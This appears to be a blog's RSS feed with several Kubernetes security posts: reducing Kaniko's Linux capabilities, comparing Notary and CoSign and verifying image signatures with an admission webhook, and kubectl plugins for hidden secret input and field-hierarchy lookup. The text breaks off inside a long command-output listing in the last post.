<p>Kaniko is a tool to build container images from a Dockerfile, inside a container or Kubernetes cluster. More information on usage, <a target="_blank" href="https://github.com/GoogleContainerTools/kaniko">here</a>.</p>
<p>Kaniko doesn't depend on a Docker daemon and executes each command within a Dockerfile completely in userspace. This enables building container images in environments that can't easily or securely run a Docker daemon, such as a standard Kubernetes cluster.</p>
<p>There are tons of tutorials on <a target="_blank" href="https://github.com/GoogleContainerTools/kaniko/blob/main/docs/tutorial.md">the internet</a> on how to use Kaniko. Rather than focusing on regular usage, we will take things a notch higher by hardening the Kaniko build process to ensure better security.</p>
<h2 id="heading-introduction-to-security-concerns">Introduction to security concerns</h2>
<ul>
<li>Kaniko runs as a container to build images</li>
<li>Kaniko runs as an unprivileged container</li>
<li>But that container runs as a root user</li>
</ul>
<p>Running a container as the root user is not recommended, but Kaniko is used here for building images (unpacking base images, changing permissions, etc.), so it requires a certain level of privilege. Hence, the root user is mandatory.</p>
<h2 id="heading-internal-working">Internal working</h2>
<p>Running a container as the root user becomes a real concern when the container also holds a wide range of Linux capabilities, which can lead to a compromise of the host machine. To prevent this, we will drop all capabilities for the Kaniko container. But as discussed above, Kaniko requires a specific set of capabilities to do its job, so let's explicitly add only those capabilities back to the Kaniko container so it can still build an image.</p>
<p>I have tried building multiple <code>Dockerfiles</code> performing different sets of operations. After reviewing the results, I found that the following capabilities are required for Kaniko to build an image.</p>
<ul>
<li>CHOWN</li>
<li>SETUID</li>
<li>SETGID</li>
<li>FOWNER</li>
<li>DAC_OVERRIDE</li>
</ul>
<h2 id="heading-hands-on-experience">Hands-on experience</h2>
<p>I used a simple <code>Dockerfile</code> for testing.</p>
<pre><code class="lang-Dockerfile">FROM alpine
ENTRYPOINT ["/bin/sh", "-c", "echo hello"]
</code></pre>
<h3 id="heading-default-capabilities-list">Default capabilities list</h3>
<p>Build the image</p>
<pre><code class="lang-bash">docker run --name capdefault -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p>Capture the PID of the above process</p>
<pre><code class="lang-bash">ps -ef | grep capdefault
</code></pre>
<p>Review the bounding set capabilities for that process. <code>CapBnd</code> will help.</p>
<pre><code class="lang-bash">grep Cap /proc/&lt;PID&gt;/status
</code></pre>
<p>Decode the <code>CapBnd</code> value to view the list of capabilities associated with that process.</p>
<pre><code class="lang-bash">capsh --decode=&lt;CapBnd_Value&gt;
</code></pre>
<p>Finally, we can see that with the default settings the container holds a wide range of Linux capabilities, which can open a gateway to numerous attacks &amp; privilege escalations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489160412/IPUg9DPGj.png" alt="capdefault-edit.png" /></p>
<h3 id="heading-dropped-all-capabilities">Dropped all capabilities</h3>
<p>Try dropping all the capabilities &amp; building the image.</p>
<pre><code class="lang-bash">docker run --name capdropall --cap-drop=all -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p>When all capabilities are dropped, kaniko won't be able to build an image. </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489176022/uBSgTmwyr.png" alt="capdropall-edit.png" /></p>
<h3 id="heading-dropped-all-capabilities-andamp-added-only-required-capabilities">Dropped all capabilities &amp; added only required capabilities</h3>
<p>As discussed in the <em>Internal working</em> section, drop all capabilities and add the capabilities that are required only for building images.</p>
<pre><code class="lang-bash">docker run --name capdropsome --cap-drop=all --cap-add CHOWN --cap-add=SETUID --cap-add=SETGID --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v $(<span class="hljs-built_in">pwd</span>)/Dockerfile:/Dockerfile -v $(<span class="hljs-built_in">pwd</span>):/kaniko-context -it gcr.io/kaniko-project/executor:latest -f /Dockerfile -c /kaniko-context --no-push
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642489193456/rvNqwQFBX.png" alt="capdropsome-edit.png" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>A wide variety of Dockerfiles should be passed to kaniko as unit tests to understand the required list of capabilities for Kaniko. If we feel any additional privileges are required to build specific Dockerfiles, we can add those capabilities to the Kaniko build container explicitly.</p>
]]></content:encoded></item><item><title><![CDATA[CoSign with Kubernetes: Ensure integrity of images before deployment]]></title><description><![CDATA[During the post-exploitation phase, attackers try to enumerate & exploit systems in stealth mode. With containers, it's very easy to run a malicious service by just changing the image name of any deployment. No SOC/IR team will get an alert for this ...]]></description><link>https://blog.rewanthtammana.com/cosign-with-kubernetes-ensure-integrity-of-images-before-deployment</link><guid isPermaLink="true">https://blog.rewanthtammana.com/cosign-with-kubernetes-ensure-integrity-of-images-before-deployment</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[Security]]></category><category><![CDATA[Validation]]></category><category><![CDATA[Continuous Integration]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 13 Jan 2022 17:46:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1642094935164/dIMHq5qQG.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>During the post-exploitation phase, attackers try to enumerate &amp; exploit systems in stealth mode. With containers, it's very easy to run a malicious service by just changing the image name of any deployment. No SOC/IR team will get an alert for this kind of operation as it looks like a regular deployment but it will open a gateway for an innumerous amount of data exfiltration &amp; act as a backdoor.</p>
<p>Hence, in cloud &amp; containerized environments, ensuring the integrity of the images being deployed is more crucial than ever.</p>
<p><a target="_blank" href="https://github.com/notaryproject/notary">Notary</a> &amp; <a target="_blank" href="https://github.com/sigstore/cosign">CoSign</a> are prominent in the industry for signing &amp; validating the integrity of images.</p>
<p>Thanks to <a target="_blank" href="https://www.giantswarm.io/">GiantSwarm</a> for the <code>ValidatingWebHook</code> boilerplate template.</p>
<p>TL;DR</p>
<h2 id="heading-high-level-overview">High-level overview</h2>
<ol>
<li>We create a private &amp; public key pair (CoSign generates an ECDSA-P256 key pair). Use a CI pipeline to perform this operation.</li>
<li>These keys need to be stored in KMS solutions like Hashicorp Vault, AWS KMS, etc.</li>
<li>Image signing happens via CI pipeline.</li>
<li>Private key will be fetched from KMS provider, stored in CI secret store &amp; used for signing of images.</li>
<li>We use the public key for validating images.</li>
</ol>
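<p>As a sketch, the key generation step with the CoSign CLI looks roughly like this (flag names can differ slightly between CoSign versions, and the KMS URI below is only a placeholder):</p>
<pre><code class="lang-bash"># Generates cosign.key (private) and cosign.pub (public) in the current directory
cosign generate-key-pair

# Alternatively, generate and store the key pair directly in a KMS provider
cosign generate-key-pair --kms hashivault://signing-key
</code></pre>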
<h3 id="heading-image-repository-snapshot">Image repository snapshot</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089885561/mXYiSwIIi.png" alt="CoSign-Random-Image-Dockerhub.PNG" /></p>
<h3 id="heading-push-signed-information-to-the-registry">Push signed information to the registry</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089893644/bdT5N2KEn.png" alt="CoSign-Random-Image-Signature-Pushed.PNG" /></p>
<h3 id="heading-image-repository-snapshot-updated">Image repository snapshot (Updated)</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642089905932/mbjrmBvBC.png" alt="CoSign-Random-Image-Signature-Dockerhub.PNG" /></p>
<h2 id="heading-cosign-workflow">CoSign Workflow</h2>
<p>Deployments can be triggered manually or in an automated fashion by leveraging solutions like <a target="_blank" href="https://argoproj.github.io/">Argo CD</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1642080027482/mit1d42M1i.jpeg" alt="CoSign-Workflow.jpg" /></p>
<p>We will be using a <code>ValidatingWebHook</code> to perform integrity validation of images. An admission controller written in Golang performs this validation.</p>
<h2 id="heading-notary-vs-cosign">Notary vs CoSign</h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Notary</td><td>CoSign</td></tr>
</thead>
<tbody>
<tr>
<td>Notary uses TUF (The Update Framework) to sign &amp; manage signatures. This framework is quite complex to maintain.</td><td>CoSign doesn't use the TUF framework.</td></tr>
<tr>
<td>Notary creates multiple keys - root, timestamp, snapshot, targets, delegation, and so on - making things even more complex.</td><td>CoSign has no such structure of different keys. We can of course use the TUF framework with CoSign, but that level of complexity isn't required in our environment.</td></tr>
<tr>
<td>Notary uses the same keys for signing &amp; validation.</td><td>CoSign uses a private key for signing &amp; a public key for validation.</td></tr>
<tr>
<td>There's no direct KMS support for key management making things further complex. This requires a lot of manual effort in securing &amp; rotating the keys.</td><td>KMS support is available for standard providers like GCP, AWS, Hashicorp.</td></tr>
<tr>
<td>Notary requires a separate database for storing the signature data.</td><td>No additional database required. All the image signatures are pushed directly to the registry.</td></tr>
<tr>
<td>HA isn't available by default; we need to build our own solutions to handle HA/auto-scaling.</td><td>Doesn't require additional hardware to run. It's just a single binary, so there is no requirement for HA/auto-scaling.</td></tr>
<tr>
<td>We need to ensure the notary server is up &amp; running for seamless integration.</td><td>CoSign connects directly with the image registry, so a health check isn't applicable.</td></tr>
<tr>
<td>Notably, Notary validation is possible only with the Docker runtime. Most environments use containerd, which can't differentiate between signed &amp; unsigned images.</td><td>CoSign has the same container runtime limitation.</td></tr>
<tr>
<td>Due to the above limitation on validating things at runtime, we have to use the Notary client to validate the images, which is an additional component to maintain in the future.</td><td>We can use a ValidatingAdmissionWebhook to achieve image validation.</td></tr>
<tr>
<td>Notary doesn't have RBAC capabilities, allowing anyone to perform privileged operations. To fix this, we have to build Notary from source with limited capabilities.</td><td>CoSign uses different keys for signing &amp; validation, hence the lack of RBAC capabilities won't be an issue.</td></tr>
<tr>
<td>Synchronizing the signature information between multiple data centers is not practical in real-time.</td><td>Synchronizing the signature data between data centers is very easy.</td></tr>
<tr>
<td>Without signature data duplication, we cannot validate images in other data center deployments. Additionally, we have to distribute multiple keys for image validation across data centers which is a real overhead.</td><td>Since, we have only one public &amp; private key, we can re-use it in different data centers without much hassle.</td></tr>
<tr>
<td>Since pushing &amp; maintaining all of those keys across multiple data centers is not feasible, we have to use a different set of keys in each data center for image signing &amp; validation, re-signing &amp; re-validating the images in each one.</td><td>This is easily achievable with CoSign. All signature information is stored in registries along with images.</td></tr>
<tr>
<td>If we use different root keys, target keys, delegation keys, and so on in different data centers, that violates the basic trust principle, single source of truth.</td><td>CoSign allows us to ensure we follow the single source of truth principle.</td></tr>
</tbody>
</table>
</div><h2 id="heading-image-signing">Image signing</h2>
<ol>
<li>After key generation, the CI pipeline pushes private &amp; public keys to the KMS provider.</li>
<li>The private key is pulled from KMS &amp; stored in the CI secret store.</li>
<li>We use the CI pipeline to sign images with private keys and push them to the registry.</li>
</ol>
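<p>A minimal sketch of the signing step the pipeline runs (the image reference and key path are placeholders; flag syntax may vary slightly across CoSign versions):</p>
<pre><code class="lang-bash"># Sign the freshly built image with the private key pulled from the CI secret store
cosign sign --key cosign.key registry.example.com/myapp:1.0.0
</code></pre>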
<h2 id="heading-image-validation">Image validation</h2>
<p>We need to validate the signature of the images before deployment. We will use <code>ValidatingWebHook</code> in Kubernetes to verify the signatures.</p>
<ol>
<li>Create a <code>ValidatingWebHook</code> to validate the image. <a target="_blank" href="https://github.com/rewanthtammana/grumpy">Sample PoC</a></li>
<li><code>ValidatingWebHook</code> deployment fetches public key from KMS for validation.</li>
<li>If a valid signature exists, it allows the deployment; otherwise, it rejects the deployment request.</li>
</ol>
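<p>Conceptually, the check the webhook performs is the same as running a CoSign verification against the public key (the image reference is a placeholder):</p>
<pre><code class="lang-bash"># Verification succeeds only if a matching signature exists in the registry
cosign verify --key cosign.pub registry.example.com/myapp:1.0.0
</code></pre>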
<h2 id="heading-validatingwebhook">ValidatingWebHook</h2>
<p><code>ValidatingWebHook</code> can be a SPOF (Single Point of Failure). So, precautionary measures should be taken to ensure it doesn't go down.</p>
<ol>
<li>Health checks at 30-second intervals using liveness probes. If the webhook is down, kill the pod &amp; spin up a new one.</li>
<li>Enable HPA (Horizontal Pod Autoscaler) for this deployment, since production traffic is very high.</li>
<li>Every deployment/pod creation in the Kubernetes cluster hits our <code>ValidatingWebHook</code> pod for image validation, so running multiple pods to handle the load is mandatory.</li>
</ol>
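<p>For example, autoscaling the webhook deployment can be a one-liner (the deployment name and thresholds below are illustrative):</p>
<pre><code class="lang-bash"># Hypothetical HPA for the webhook deployment; name and limits are placeholders
kubectl autoscale deployment image-validation-webhook --min=2 --max=10 --cpu-percent=70
</code></pre>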
<h2 id="heading-key-managementrotation">Key Management/Rotation</h2>
<p>To comply with security guidelines, it's better to automate the key rotation process using pipelines.</p>
<ol>
<li>Build pipelines should have a script to retrieve the list of all signed images from the repository.</li>
<li>A clean-up has to be done on all the signature data in the registry.</li>
<li>A new key-pair needs to be created using pipeline &amp; the keys to be sent to the KMS provider.</li>
<li>Pull the private key from KMS &amp; put it in the CI secret store.</li>
<li>From step 1, we have the list of previously signed images. Re-sign all the images with the new private key &amp; push them to the registry.</li>
</ol>
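<p>Step 5 can be scripted along these lines (the image list file and key name are placeholders):</p>
<pre><code class="lang-bash"># Re-sign every previously signed image with the rotated private key
while read -r image; do
  cosign sign --key cosign-new.key "$image"
done &lt; signed-images.txt
</code></pre>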
<h2 id="heading-poc">POC</h2>
<p>Hands-on experience: <a target="_blank" href="https://github.com/rewanthtammana/grumpy">https://github.com/rewanthtammana/grumpy</a></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>Considering the design, usage, maintenance &amp; architectural advantages, CoSign is undoubtedly the better choice to achieve our goal.</p>
]]></content:encoded></item><item><title><![CDATA[Kubectl Whisper Secrets: Create Kubernetes Secrets With Secure Input]]></title><description><![CDATA[This blog post focuses on a plugin that allows end user to "Create Kubernetes secrets by taking secure input from the console".
The in-line secret creation feature in Kubernetes is vulnerable to shoulder surfing attacks. In this blog, we will

Glance...]]></description><link>https://blog.rewanthtammana.com/kubectl-whisper-secrets-create-kubernetes-secrets-with-secure-input</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubectl-whisper-secrets-create-kubernetes-secrets-with-secure-input</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[automation]]></category><category><![CDATA[plugins]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 03 Nov 2021 12:11:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1634406419822/-LnabVNc2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This blog post focuses on a plugin that allows end user to "Create Kubernetes secrets by taking secure input from the console".</p>
<p>The in-line secret creation feature in Kubernetes is vulnerable to shoulder surfing attacks. In this blog, we will</p>
<ul>
<li>Glance through the features to create Kubernetes secrets</li>
<li>Analyze the risks with default approach</li>
<li>Get introduced to the plugin that fixes this problem</li>
</ul>
<p><strong>Github link of the plugin:</strong> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-whisper-secret">rewanthtammana/kubectl-whisper-secret</a></p>
<h3 id="heading-introduction-to-kubernetes">Introduction to Kubernetes</h3>
<blockquote>
<p>Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management. kubectl provides a CLI interface to manage Kubernetes clusters. Kubectl enables the users to run different operations like describe, edit, exec, explain, logs, run, etc on Kubernetes clusters.</p>
<p>Kubernetes secret is an object that contains a small amount of sensitive data such as a password, a token, or a key. Such information might otherwise be put in a Pod specification or in a container image. Using a Secret means that you don't need to include confidential data in your application code.</p>
</blockquote>
<h3 id="heading-kubectl-cli">Kubectl CLI</h3>
<blockquote>
<p>The kubectl CLI has an extended feature called kubectl plugins - this advanced feature allows users to develop plugins to customize kubectl functionality. I leveraged this feature &amp; built this plugin to solve the problem described above.</p>
</blockquote>
<h3 id="heading-default-approach">Default approach</h3>
<p>We have different ways to create <a target="_blank" href="https://kubernetes.io/docs/concepts/configuration/secret/">Kubernetes secrets</a>. Input can be provided via</p>
<ol>
<li>CLI, <code>--from-literal</code></li>
<li>File, <code>--from-file</code></li>
<li>Env files, <code>--from-env-file</code></li>
</ol>
<p>We are more interested in the <code>--from-literal</code> feature because it's more subjected to attack. Below are a couple of examples.</p>
<h4 id="heading-creating-a-generic-secret">Creating a generic secret</h4>
<pre><code class="lang-bash">kubectl create secret generic my-secret --from-literal key1=value1 --from-literal key2=value2
</code></pre>
<h4 id="heading-creating-docker-registry-secrets">Creating docker registry secrets</h4>
<pre><code class="lang-bash">kubectl create secret docker-registry my-docker-secret --docker-password s3cur3D0ck3rP@ssw0rD --docker-username root
</code></pre>
<p>In both the above examples, the secret value is exposed to <a href="https://en.wikipedia.org/wiki/Shoulder_surfing_(computer_security)">shoulder surfing attacks</a>. This can lead to password leakage &amp; authentication bypasses.</p>
<h3 id="heading-proposed-approach">Proposed approach</h3>
<p>I leveraged the <em>kubectl plugins</em> feature &amp; built a plugin to demonstrate an alternative solution &amp; approach to this problem.</p>
<p>Instead of passing sensitive values on the command line, this plugin prompts you for each value on the console, so the secret never appears in the command itself.</p>
<pre><code class="lang-bash">kubectl whisper-secret generic my-secret --from-literal key1 --from-literal key2
Enter value <span class="hljs-keyword">for</span> key1: 
Enter value <span class="hljs-keyword">for</span> key2: 
secret/my-secret created
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1634403642792/6kq8O8A3N.png" alt="rewanthtammana-kubectl-whisper-secret-proposed-approach.PNG" /></p>
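<p>The result is a regular Kubernetes secret, so it can be verified the usual way, for example:</p>
<pre><code class="lang-bash"># Decode one of the stored values to confirm the secret was created as expected
kubectl get secret my-secret -o jsonpath='{.data.key1}' | base64 -d
</code></pre>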
<h3 id="heading-bonus">Bonus</h3>
<p><code>kubectl whisper-secret</code> is now integrated with <a target="_blank" href="https://github.com/kubernetes-sigs/krew">krew</a>, a kubectl plugin manager. The integration works on all platforms, so the plugin can be installed directly with krew. It's as simple as:</p>
<pre><code class="lang-bash">kubectl krew install whisper-secret
</code></pre>
<h3 id="heading-references">References</h3>
<ul>
<li><a target="_blank" href="https://discover.hubpages.com/technology/What-Is-Shoulder-Surfing">What is shoulder surfing?</a></li>
<li><a target="_blank" href="https://github.com/rewanthtammana/kubectl-whisper-secret">Kubectl whisper secret</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Kubectl Fields: One-liner Kubernetes Resource Hierarchy Dumper]]></title><description><![CDATA[This blog post focuses on why I built the "Kubernetes resources hierarchy parser plugin". This plugin prints the hierarchy resources in one-liners & saves a ton of time for the end-users while writing or editing Kubernetes object configuration files....]]></description><link>https://blog.rewanthtammana.com/kubectl-fields-one-liner-kubernetes-resource-hierarchy-dumper</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubectl-fields-one-liner-kubernetes-resource-hierarchy-dumper</guid><category><![CDATA[Go Language]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[automation]]></category><category><![CDATA[plugins]]></category><category><![CDATA[extension]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 03 Sep 2021 11:27:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1630668357455/Jo8vE1em6.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This blog post focuses on why I built the "Kubernetes resources hierarchy parser plugin". This plugin prints the hierarchy resources in one-liners &amp; saves a ton of time for the end-users while writing or editing Kubernetes object configuration files.</p>
<p><strong>Github link:</strong> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-fields">https://github.com/rewanthtammana/kubectl-fields</a></p>
<h3 id="heading-problem-statement">Problem Statement</h3>
<p>For example, say you want to add <code>capabilities</code>/<code>securityContext</code> to your pod configuration. The only way to achieve this is by recursively expanding the <code>kubectl explain</code> output and using the <code>grep</code> command. This default method of identifying the hierarchy of specific fields for any Kubernetes resource is cumbersome &amp; tedious.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1630670086713/N6_8Z15o_.png" alt="rewanthtammana-kubectl-fields-tedious-default-approach.png" /></p>
<h3 id="heading-introduction-to-kubernetes">Introduction to Kubernetes</h3>
<blockquote>
<p><a target="_blank" href="https://kubernetes.io/">Kubernetes</a>  is an open-source container orchestration system for automating application deployment, scaling, and management.  <a target="_blank" href="https://kubernetes.io/docs/reference/kubectl/kubectl/">kubectl</a>  provides a CLI interface to manage Kubernetes clusters. Kubectl enables the users to run different  <a target="_blank" href="https://kubernetes.io/docs/reference/kubectl/overview/#operations">operations</a>  like describe, edit, exec, explain, logs, run, etc on Kubernetes clusters.</p>
<p>Kubernetes objects can be created, updated, and deleted by writing object  <a target="_blank" href="https://kubernetes.io/docs/tasks/manage-kubernetes-objects/declarative-config/">configuration files </a> either in declarative/imperative method. Kubernetes object configuration files need to follow a pre-defined parental hierarchy structure. All the configuration files need to be addressed in the same pre-defined sequential/parental order to get processed by Kubernetes.</p>
</blockquote>
<h3 id="heading-kubectl-cli">Kubectl CLI</h3>
<blockquote>
<p>The kubectl CLI has an extended feature called <strong>kubectl plugins</strong> - this advanced feature allows users to develop plugins to customize kubectl functionality. I leveraged this feature &amp; built this plugin to solve the problem described above.</p>
</blockquote>
<h3 id="heading-default-approach">Default approach</h3>
<p>Let' say you want to add <code>capabilities</code> to your pod configuration.</p>
<p>To achieve this, the first thing is to know the hierarchy of <code>capabilities</code> for chosen resources.</p>
<p>The current/default methodology to find the hierarchical order for any field is to use <code>grep</code> or similar commands for the specific field in the terminal.</p>
<pre><code class="lang-bash">$ kubectl explain --recursive po.spec | grep capabilities
         capabilities   &lt;Object&gt;
         capabilities   &lt;Object&gt;
</code></pre>
<p>The above result shows only the matched patterns but doesn't show the parental hierarchy. Alternatively, the search can be extended with grep's advanced options, such as printing surrounding context.</p>
<pre><code class="lang-bash">$ kubectl explain --recursive po.spec | grep capabilities -C 5
      resources &lt;Object&gt;
         limits &lt;map[string]string&gt;
         requests       &lt;map[string]string&gt;
      securityContext   &lt;Object&gt;
         allowPrivilegeEscalation       &lt;boolean&gt;
         capabilities   &lt;Object&gt;
            add &lt;[]string&gt;
            drop        &lt;[]string&gt;
         privileged     &lt;boolean&gt;
         procMount      &lt;string&gt;
         readOnlyRootFilesystem &lt;boolean&gt;
--
      resources &lt;Object&gt;
         limits &lt;map[string]string&gt;
         requests       &lt;map[string]string&gt;
      securityContext   &lt;Object&gt;
         allowPrivilegeEscalation       &lt;boolean&gt;
         capabilities   &lt;Object&gt;
            add &lt;[]string&gt;
            drop        &lt;[]string&gt;
         privileged     &lt;boolean&gt;
         procMount      &lt;string&gt;
         readOnlyRootFilesystem &lt;boolean&gt;
</code></pre>
<p>Though the above <code>grep</code> command gives us a rough idea of the hierarchy, it doesn’t show the complete sequence and we have to print the entire output &amp; scroll through the terminal to find the right order.</p>
<details>

<summary><strong>kubectl explain --recursive po.spec (click to expand 624-line output)</strong></summary>

<code class="lang-bash">
$ kubectl explain --recursive po.spec
KIND:     Pod
VERSION:  v1

RESOURCE: spec &lt;Object&gt;

DESCRIPTION:
     Specification of the desired behavior of the pod. More info:
     https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

     PodSpec is a description of a pod.

FIELDS:
   activeDeadlineSeconds    &lt;integer&gt;
   affinity    &lt;Object&gt;
      nodeAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            preference    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchFields    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;Object&gt;
            nodeSelectorTerms    &lt;[]Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchFields    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
      podAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            podAffinityTerm    &lt;Object&gt;
               labelSelector    &lt;Object&gt;
                  matchExpressions    &lt;[]Object&gt;
                     key    &lt;string&gt;
                     operator    &lt;string&gt;
                     values    &lt;[]string&gt;
                  matchLabels    &lt;map[string]string&gt;
               namespaces    &lt;[]string&gt;
               topologyKey    &lt;string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            labelSelector    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchLabels    &lt;map[string]string&gt;
            namespaces    &lt;[]string&gt;
            topologyKey    &lt;string&gt;
      podAntiAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            podAffinityTerm    &lt;Object&gt;
               labelSelector    &lt;Object&gt;
                  matchExpressions    &lt;[]Object&gt;
                     key    &lt;string&gt;
                     operator    &lt;string&gt;
                     values    &lt;[]string&gt;
                  matchLabels    &lt;map[string]string&gt;
               namespaces    &lt;[]string&gt;
               topologyKey    &lt;string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            labelSelector    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchLabels    &lt;map[string]string&gt;
            namespaces    &lt;[]string&gt;
            topologyKey    &lt;string&gt;
   automountServiceAccountToken    &lt;boolean&gt;
   containers    &lt;[]Object&gt;
      args    &lt;[]string&gt;
      command    &lt;[]string&gt;
      env    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
         valueFrom    &lt;Object&gt;
            configMapKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
            secretKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
      envFrom    &lt;[]Object&gt;
         configMapRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
         prefix    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
      image    &lt;string&gt;
      imagePullPolicy    &lt;string&gt;
      lifecycle    &lt;Object&gt;
         postStart    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
         preStop    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
      livenessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      name    &lt;string&gt;
      ports    &lt;[]Object&gt;
         containerPort    &lt;integer&gt;
         hostIP    &lt;string&gt;
         hostPort    &lt;integer&gt;
         name    &lt;string&gt;
         protocol    &lt;string&gt;
      readinessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      resources    &lt;Object&gt;
         limits    &lt;map[string]string&gt;
         requests    &lt;map[string]string&gt;
      securityContext    &lt;Object&gt;
         allowPrivilegeEscalation    &lt;boolean&gt;
         capabilities    &lt;Object&gt;
            add    &lt;[]string&gt;
            drop    &lt;[]string&gt;
         privileged    &lt;boolean&gt;
         procMount    &lt;string&gt;
         readOnlyRootFilesystem    &lt;boolean&gt;
         runAsGroup    &lt;integer&gt;
         runAsNonRoot    &lt;boolean&gt;
